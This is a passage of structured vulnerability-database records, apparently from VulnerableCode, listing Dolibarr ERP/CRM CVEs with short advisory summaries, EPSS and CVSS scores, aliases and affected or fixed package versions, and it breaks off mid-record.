| 0 |
| url |
VCID-11u2-56qq-cye4 |
| vulnerability_id |
VCID-11u2-56qq-cye4 |
| summary |
SQL Injection
An issue was discovered in Dolibarr `expensereport/card.php` in the expense reports module that allows SQL injection via the `integer` parameters `qty` and `value_unit`. |
| references |
| 0 |
| reference_url |
https://api.first.org/data/v1/epss?cve=CVE-2018-16809 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
0.00707 |
| scoring_system |
epss |
| scoring_elements |
0.72548 |
| published_at |
2026-06-04T12:55:00Z |
|
| 1 |
| value |
0.00707 |
| scoring_system |
epss |
| scoring_elements |
0.72576 |
| published_at |
2026-06-07T12:55:00Z |
|
| 2 |
| value |
0.00707 |
| scoring_system |
epss |
| scoring_elements |
0.72595 |
| published_at |
2026-06-06T12:55:00Z |
|
| 3 |
| value |
0.00707 |
| scoring_system |
epss |
| scoring_elements |
0.72588 |
| published_at |
2026-06-05T12:55:00Z |
|
|
| url |
https://api.first.org/data/v1/epss?cve=CVE-2018-16809 |
|
| 1 |
|
| 2 |
|
| 3 |
|
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@7.0.1 |
| purl |
pkg:composer/dolibarr/dolibarr@7.0.1 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1jh7-xexf-53cw |
|
| 2 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 3 |
| vulnerability |
VCID-2wnq-rrff-tbbt |
|
| 4 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 5 |
| vulnerability |
VCID-3ewz-9zgb-efa7 |
|
| 6 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 7 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 8 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 9 |
| vulnerability |
VCID-62rq-q7na-9kgj |
|
| 10 |
| vulnerability |
VCID-651j-rw3n-kkgu |
|
| 11 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 12 |
| vulnerability |
VCID-6nme-3afj-qfdp |
|
| 13 |
| vulnerability |
VCID-6ten-mcds-gbd7 |
|
| 14 |
| vulnerability |
VCID-79xt-u5af-cqey |
|
| 15 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 16 |
| vulnerability |
VCID-7kz1-s7qf-aqan |
|
| 17 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 18 |
| vulnerability |
VCID-7txt-x88q-2bej |
|
| 19 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 20 |
| vulnerability |
VCID-b65k-vs97-63fj |
|
| 21 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 22 |
| vulnerability |
VCID-dph7-h5d5-gyct |
|
| 23 |
| vulnerability |
VCID-e39t-gvd4-j7ag |
|
| 24 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 25 |
| vulnerability |
VCID-ehb1-ac3n-p7fv |
|
| 26 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 27 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 28 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 29 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 30 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 31 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 32 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 33 |
| vulnerability |
VCID-jy5f-3h8w-qqff |
|
| 34 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 35 |
| vulnerability |
VCID-m9p7-7wnz-7uck |
|
| 36 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 37 |
| vulnerability |
VCID-nmjf-yxwc-m7hj |
|
| 38 |
| vulnerability |
VCID-nnth-kevf-vybz |
|
| 39 |
| vulnerability |
VCID-pejz-pskb-aqbg |
|
| 40 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 41 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 42 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 43 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 44 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 45 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 46 |
| vulnerability |
VCID-uzz6-3bze-mbez |
|
| 47 |
| vulnerability |
VCID-v5bc-wjmv-ubhx |
|
| 48 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 49 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 50 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 51 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 52 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 53 |
| vulnerability |
VCID-yumf-hmep-eqd6 |
|
| 54 |
| vulnerability |
VCID-yup5-ztvt-cfgp |
|
| 55 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@7.0.1 |
|
|
| aliases |
CVE-2018-16809, GHSA-h34q-878w-w96r
|
| risk_score |
4.5 |
| exploitability |
0.5 |
| weighted_severity |
9.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-11u2-56qq-cye4 |
|
| 1 |
| url |
VCID-1225-a2a6-bkan |
| vulnerability_id |
VCID-1225-a2a6-bkan |
| summary |
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Cross Site Scripting vulnerability in Dolibarr ERP CRM v.17.0.1 and before allows a remote attacker to obtain sensitive information and execute arbitrary code via the REST API module, related to analyseVarsForSqlAndScriptsInjection and testSqlAndScriptInject. |
| references |
| 0 |
| reference_url |
http://dolibarr.com |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
9.6 |
| scoring_system |
cvssv3.1 |
| scoring_elements |
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H |
|
| 1 |
| value |
CRITICAL |
| scoring_system |
generic_textual |
| scoring_elements |
|
|
| 2 |
| value |
Track* |
| scoring_system |
ssvc |
| scoring_elements |
SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-09-25T15:01:54Z/ |
|
|
| url |
http://dolibarr.com |
|
| 1 |
|
| 2 |
|
| 3 |
|
| 4 |
|
| 5 |
|
|
| fixed_packages |
|
| aliases |
CVE-2023-38888, GHSA-62wf-h26v-5m57
|
| risk_score |
4.5 |
| exploitability |
0.5 |
| weighted_severity |
9.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-1225-a2a6-bkan |
|
| 2 |
| url |
VCID-1jh7-xexf-53cw |
| vulnerability_id |
VCID-1jh7-xexf-53cw |
| summary |
Dolibarr ERP and CRM malicious executable loading
Dolibarr ERP/CRM 9.0.1 provides a web-based functionality that backs up the database content to a dump file. However, the application performs insufficient checks on the export parameters to mysqldump, which can lead to execution of arbitrary binaries on the server. (Malicious binaries can be uploaded by abusing other functionalities of the application.) |
| references |
| 0 |
| reference_url |
https://api.first.org/data/v1/epss?cve=CVE-2019-11200 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
0.0116 |
| scoring_system |
epss |
| scoring_elements |
0.78931 |
| published_at |
2026-06-04T12:55:00Z |
|
| 1 |
| value |
0.0116 |
| scoring_system |
epss |
| scoring_elements |
0.78955 |
| published_at |
2026-06-07T12:55:00Z |
|
| 2 |
| value |
0.0116 |
| scoring_system |
epss |
| scoring_elements |
0.78964 |
| published_at |
2026-06-06T12:55:00Z |
|
| 3 |
| value |
0.0116 |
| scoring_system |
epss |
| scoring_elements |
0.78958 |
| published_at |
2026-06-05T12:55:00Z |
|
|
| url |
https://api.first.org/data/v1/epss?cve=CVE-2019-11200 |
|
| 1 |
|
| 2 |
|
| 3 |
|
| 4 |
|
| 5 |
|
| 6 |
|
| 7 |
|
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@9.0.2 |
| purl |
pkg:composer/dolibarr/dolibarr@9.0.2 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 2 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 3 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 4 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 5 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 6 |
| vulnerability |
VCID-62rq-q7na-9kgj |
|
| 7 |
| vulnerability |
VCID-651j-rw3n-kkgu |
|
| 8 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 9 |
| vulnerability |
VCID-6nme-3afj-qfdp |
|
| 10 |
| vulnerability |
VCID-6ten-mcds-gbd7 |
|
| 11 |
| vulnerability |
VCID-79xt-u5af-cqey |
|
| 12 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 13 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 14 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 15 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 16 |
| vulnerability |
VCID-dph7-h5d5-gyct |
|
| 17 |
| vulnerability |
VCID-e39t-gvd4-j7ag |
|
| 18 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 19 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 20 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 21 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 22 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 23 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 24 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 25 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 26 |
| vulnerability |
VCID-jy5f-3h8w-qqff |
|
| 27 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 28 |
| vulnerability |
VCID-m9p7-7wnz-7uck |
|
| 29 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 30 |
| vulnerability |
VCID-nnth-kevf-vybz |
|
| 31 |
| vulnerability |
VCID-pejz-pskb-aqbg |
|
| 32 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 33 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 34 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 35 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 36 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 37 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 38 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 39 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 40 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 41 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 42 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 43 |
| vulnerability |
VCID-yumf-hmep-eqd6 |
|
| 44 |
| vulnerability |
VCID-yup5-ztvt-cfgp |
|
| 45 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@9.0.2 |
|
| 1 |
| url |
pkg:composer/dolibarr/dolibarr@9.0.3 |
| purl |
pkg:composer/dolibarr/dolibarr@9.0.3 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 2 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 3 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 4 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 5 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 6 |
| vulnerability |
VCID-62rq-q7na-9kgj |
|
| 7 |
| vulnerability |
VCID-651j-rw3n-kkgu |
|
| 8 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 9 |
| vulnerability |
VCID-6nme-3afj-qfdp |
|
| 10 |
| vulnerability |
VCID-6ten-mcds-gbd7 |
|
| 11 |
| vulnerability |
VCID-79xt-u5af-cqey |
|
| 12 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 13 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 14 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 15 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 16 |
| vulnerability |
VCID-dph7-h5d5-gyct |
|
| 17 |
| vulnerability |
VCID-e39t-gvd4-j7ag |
|
| 18 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 19 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 20 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 21 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 22 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 23 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 24 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 25 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 26 |
| vulnerability |
VCID-jy5f-3h8w-qqff |
|
| 27 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 28 |
| vulnerability |
VCID-m9p7-7wnz-7uck |
|
| 29 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 30 |
| vulnerability |
VCID-nnth-kevf-vybz |
|
| 31 |
| vulnerability |
VCID-pejz-pskb-aqbg |
|
| 32 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 33 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 34 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 35 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 36 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 37 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 38 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 39 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 40 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 41 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 42 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 43 |
| vulnerability |
VCID-yumf-hmep-eqd6 |
|
| 44 |
| vulnerability |
VCID-yup5-ztvt-cfgp |
|
| 45 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@9.0.3 |
|
|
| aliases |
CVE-2019-11200, GHSA-2rwh-262r-r85j
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-1jh7-xexf-53cw |
|
| 3 |
| url |
VCID-1uje-n8xc-y7b7 |
| vulnerability_id |
VCID-1uje-n8xc-y7b7 |
| summary |
Dolibarr vulnerable to remote code execution via uppercase manipulation
Dolibarr before 17.0.1 allows remote code execution by an authenticated user via an uppercase manipulation: <?PHP instead of <?php in injected data. |
| references |
| 0 |
|
| 1 |
| reference_url |
https://github.com/Dolibarr/dolibarr |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
8.8 |
| scoring_system |
cvssv3.1 |
| scoring_elements |
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
|
| 1 |
| value |
HIGH |
| scoring_system |
generic_textual |
| scoring_elements |
|
|
| 2 |
| value |
Track* |
| scoring_system |
ssvc |
| scoring_elements |
SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-01-14T17:09:35Z/ |
|
|
| url |
https://github.com/Dolibarr/dolibarr |
|
| 2 |
|
| 3 |
|
| 4 |
| reference_url |
https://www.swascan.com/blog/ |
| reference_id |
blog |
| reference_type |
|
| scores |
| 0 |
| value |
8.8 |
| scoring_system |
cvssv3.1 |
| scoring_elements |
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
|
| 1 |
| value |
Track* |
| scoring_system |
ssvc |
| scoring_elements |
SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-01-14T17:09:35Z/ |
|
|
| url |
https://www.swascan.com/blog/ |
|
| 5 |
|
| 6 |
|
| 7 |
|
|
| fixed_packages |
|
| aliases |
CVE-2023-30253, GHSA-9wqr-5jp4-mjmh
|
| risk_score |
10.0 |
| exploitability |
2.0 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-1uje-n8xc-y7b7 |
|
| 4 |
| url |
VCID-2wnq-rrff-tbbt |
| vulnerability_id |
VCID-2wnq-rrff-tbbt |
| summary |
Dolibarr has SQL injection vulnerability in the rowid parameter of the admin dict.php
Dolibarr ERP-CRM 8.0.4 contains an SQL injection vulnerability in the rowid parameter of the admin dict.php endpoint that allows attackers to execute arbitrary SQL queries. Attackers can inject malicious SQL code through the rowid POST parameter to extract sensitive database information using error-based SQL injection techniques. |
| references |
| 0 |
| reference_url |
https://api.first.org/data/v1/epss?cve=CVE-2019-25710 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
0.00036 |
| scoring_system |
epss |
| scoring_elements |
0.11275 |
| published_at |
2026-06-06T12:55:00Z |
|
| 1 |
| value |
0.00036 |
| scoring_system |
epss |
| scoring_elements |
0.11241 |
| published_at |
2026-06-07T12:55:00Z |
|
| 2 |
| value |
0.00036 |
| scoring_system |
epss |
| scoring_elements |
0.11196 |
| published_at |
2026-06-04T12:55:00Z |
|
| 3 |
| value |
0.00036 |
| scoring_system |
epss |
| scoring_elements |
0.11284 |
| published_at |
2026-06-05T12:55:00Z |
|
|
| url |
https://api.first.org/data/v1/epss?cve=CVE-2019-25710 |
|
| 1 |
| reference_url |
https://github.com/Dolibarr/dolibarr |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
8.2 |
| scoring_system |
cvssv3.1 |
| scoring_elements |
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N |
|
| 1 |
| value |
8.8 |
| scoring_system |
cvssv4 |
| scoring_elements |
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N |
|
| 2 |
| value |
HIGH |
| scoring_system |
generic_textual |
| scoring_elements |
|
|
|
| url |
https://github.com/Dolibarr/dolibarr |
|
| 2 |
|
| 3 |
|
| 4 |
| reference_url |
https://www.dolibarr.org |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
8.2 |
| scoring_system |
cvssv3.1 |
| scoring_elements |
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N |
|
| 1 |
| value |
8.8 |
| scoring_system |
cvssv4 |
| scoring_elements |
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N |
|
| 2 |
| value |
HIGH |
| scoring_system |
generic_textual |
| scoring_elements |
|
|
|
| url |
https://www.dolibarr.org |
|
| 5 |
| reference_url |
https://www.exploit-db.com/exploits/46095 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
8.2 |
| scoring_system |
cvssv3.1 |
| scoring_elements |
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N |
|
| 1 |
| value |
8.8 |
| scoring_system |
cvssv4 |
| scoring_elements |
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N |
|
| 2 |
| value |
HIGH |
| scoring_system |
generic_textual |
| scoring_elements |
|
|
| 3 |
| value |
Track |
| scoring_system |
ssvc |
| scoring_elements |
SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-13T12:07:10Z/ |
|
|
| url |
https://www.exploit-db.com/exploits/46095 |
|
| 6 |
|
| 7 |
|
| 8 |
| reference_url |
https://www.dolibarr.org/ |
| reference_id |
www.dolibarr.org |
| reference_type |
|
| scores |
| 0 |
| value |
8.2 |
| scoring_system |
cvssv3.1 |
| scoring_elements |
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N |
|
| 1 |
| value |
8.8 |
| scoring_system |
cvssv4 |
| scoring_elements |
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N |
|
| 2 |
| value |
Track |
| scoring_system |
ssvc |
| scoring_elements |
SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-13T12:07:10Z/ |
|
|
| url |
https://www.dolibarr.org/ |
|
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@8.0.5 |
| purl |
pkg:composer/dolibarr/dolibarr@8.0.5 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1jh7-xexf-53cw |
|
| 2 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 3 |
| vulnerability |
VCID-3cg6-pnf4-jkc1 |
|
| 4 |
| vulnerability |
VCID-3ewz-9zgb-efa7 |
|
| 5 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 6 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 7 |
| vulnerability |
VCID-4j1s-mnar-1bef |
|
| 8 |
| vulnerability |
VCID-62rq-q7na-9kgj |
|
| 9 |
| vulnerability |
VCID-651j-rw3n-kkgu |
|
| 10 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 11 |
| vulnerability |
VCID-6nme-3afj-qfdp |
|
| 12 |
| vulnerability |
VCID-6ten-mcds-gbd7 |
|
| 13 |
| vulnerability |
VCID-79xt-u5af-cqey |
|
| 14 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 15 |
| vulnerability |
VCID-7kz1-s7qf-aqan |
|
| 16 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 17 |
| vulnerability |
VCID-7txt-x88q-2bej |
|
| 18 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 19 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 20 |
| vulnerability |
VCID-dph7-h5d5-gyct |
|
| 21 |
| vulnerability |
VCID-e39t-gvd4-j7ag |
|
| 22 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 23 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 24 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 25 |
| vulnerability |
VCID-g3x8-rhqm-fuh2 |
|
| 26 |
| vulnerability |
VCID-hrwp-s15m-ffa1 |
|
| 27 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 28 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 29 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 30 |
| vulnerability |
VCID-jy5f-3h8w-qqff |
|
| 31 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 32 |
| vulnerability |
VCID-m9p7-7wnz-7uck |
|
| 33 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 34 |
| vulnerability |
VCID-nnth-kevf-vybz |
|
| 35 |
| vulnerability |
VCID-pejz-pskb-aqbg |
|
| 36 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 37 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 38 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 39 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 40 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 41 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 42 |
| vulnerability |
VCID-v9g8-u2uq-7yff |
|
| 43 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 44 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 45 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
| 46 |
| vulnerability |
VCID-yn53-kazm-1ugc |
|
| 47 |
| vulnerability |
VCID-yumf-hmep-eqd6 |
|
| 48 |
| vulnerability |
VCID-yup5-ztvt-cfgp |
|
| 49 |
| vulnerability |
VCID-z1ty-xypd-t3ct |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@8.0.5 |
|
|
| aliases |
CVE-2019-25710, GHSA-xxxg-x793-7fq3
|
| risk_score |
4.0 |
| exploitability |
0.5 |
| weighted_severity |
8.0 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-2wnq-rrff-tbbt |
|
| 5 |
| url |
VCID-3cg6-pnf4-jkc1 |
| vulnerability_id |
VCID-3cg6-pnf4-jkc1 |
| summary |
Business Logic Errors in Packagist dolibarr/dolibarr |
| references |
| 0 |
| reference_url |
https://api.first.org/data/v1/epss?cve=CVE-2022-0414 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
0.00326 |
| scoring_system |
epss |
| scoring_elements |
0.55861 |
| published_at |
2026-06-04T12:55:00Z |
|
| 1 |
| value |
0.00326 |
| scoring_system |
epss |
| scoring_elements |
0.5591 |
| published_at |
2026-06-07T12:55:00Z |
|
| 2 |
| value |
0.00326 |
| scoring_system |
epss |
| scoring_elements |
0.55923 |
| published_at |
2026-06-06T12:55:00Z |
|
| 3 |
| value |
0.00326 |
| scoring_system |
epss |
| scoring_elements |
0.55917 |
| published_at |
2026-06-05T12:55:00Z |
|
|
| url |
https://api.first.org/data/v1/epss?cve=CVE-2022-0414 |
|
| 1 |
|
| 2 |
|
| 3 |
|
| 4 |
|
| 5 |
|
|
| fixed_packages |
| 0 |
| url |
pkg:composer/dolibarr/dolibarr@15.0.0 |
| purl |
pkg:composer/dolibarr/dolibarr@15.0.0 |
| is_vulnerable |
true |
| affected_by_vulnerabilities |
| 0 |
| vulnerability |
VCID-1225-a2a6-bkan |
|
| 1 |
| vulnerability |
VCID-1uje-n8xc-y7b7 |
|
| 2 |
| vulnerability |
VCID-3xdg-az5a-dyft |
|
| 3 |
| vulnerability |
VCID-4c2v-phxx-y3h8 |
|
| 4 |
| vulnerability |
VCID-6drz-jsq4-wyhd |
|
| 5 |
| vulnerability |
VCID-7ku4-fwqc-33ba |
|
| 6 |
| vulnerability |
VCID-7qjh-teat-tqav |
|
| 7 |
| vulnerability |
VCID-8fjr-6hdm-vqdd |
|
| 8 |
| vulnerability |
VCID-d4uk-4adf-mba9 |
|
| 9 |
| vulnerability |
VCID-egxz-r3nw-xffm |
|
| 10 |
| vulnerability |
VCID-ewrf-wdsh-kqgs |
|
| 11 |
| vulnerability |
VCID-f122-u34a-kfcm |
|
| 12 |
| vulnerability |
VCID-htgn-37m4-c7fu |
|
| 13 |
| vulnerability |
VCID-j345-dk2c-yfds |
|
| 14 |
| vulnerability |
VCID-jbkd-su9m-3udy |
|
| 15 |
| vulnerability |
VCID-k9nc-tze6-k7bx |
|
| 16 |
| vulnerability |
VCID-mpmz-eh21-nkcm |
|
| 17 |
| vulnerability |
VCID-pfyf-s4fc-d3a8 |
|
| 18 |
| vulnerability |
VCID-rqux-jkta-4kfj |
|
| 19 |
| vulnerability |
VCID-s3xn-47cy-eucf |
|
| 20 |
| vulnerability |
VCID-srth-2stq-gyaq |
|
| 21 |
| vulnerability |
VCID-tmv2-39y8-f7f1 |
|
| 22 |
| vulnerability |
VCID-tsbf-m4eq-gbgp |
|
| 23 |
| vulnerability |
VCID-vp4z-qpc7-uug1 |
|
| 24 |
| vulnerability |
VCID-vwxd-syyk-jueh |
|
| 25 |
| vulnerability |
VCID-w7ww-nq62-e7b1 |
|
|
| resource_url |
http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@15.0.0 |
|
| 1 |
|
|
| aliases |
CVE-2022-0414, GHSA-f768-8pvq-mm6r
|
| risk_score |
3.1 |
| exploitability |
0.5 |
| weighted_severity |
6.2 |
| resource_url |
http://public2.vulnerablecode.io/vulnerabilities/VCID-3cg6-pnf4-jkc1 |
|
| 6 |
| url |
VCID-3dpn-ry9j-rff6 |
| vulnerability_id |
VCID-3dpn-ry9j-rff6 |
| summary |
Unrestricted Upload of File with Dangerous Type
Dolibarr ERP/CRM allows low-privilege users to upload files of dangerous types, which can result in arbitrary code execution within the context of the vulnerable application. |
| references |
| 0 |
| reference_url |
https://api.first.org/data/v1/epss?cve=CVE-2017-9840 |
| reference_id |
|
| reference_type |
|
| scores |
| 0 |
| value |
0.00698 |
| scoring_system |
epss |
| scoring_elements |
0.72364 |
| published_at |
2026-06-07T12:55:00Z |
|
| 1 |
| value |
0.00698 |
| scoring_system |
epss |
| scoring_elements |
0.72336 |
| published_at |
2026-06-04T12:55:00Z |
|
| 2 |
| value |
0.00698 |
| scoring_system |
epss |
| scoring_elements |
0.72378 |
| published_at |
2026-06-05T12:55:00Z |
|
| 3 |
| value |
0.00698 |
| scoring_system |
epss |
| scoring_elements |
0.72384 |
| published_at |
2026-06-06T12:55:00Z |
|
|
| url |
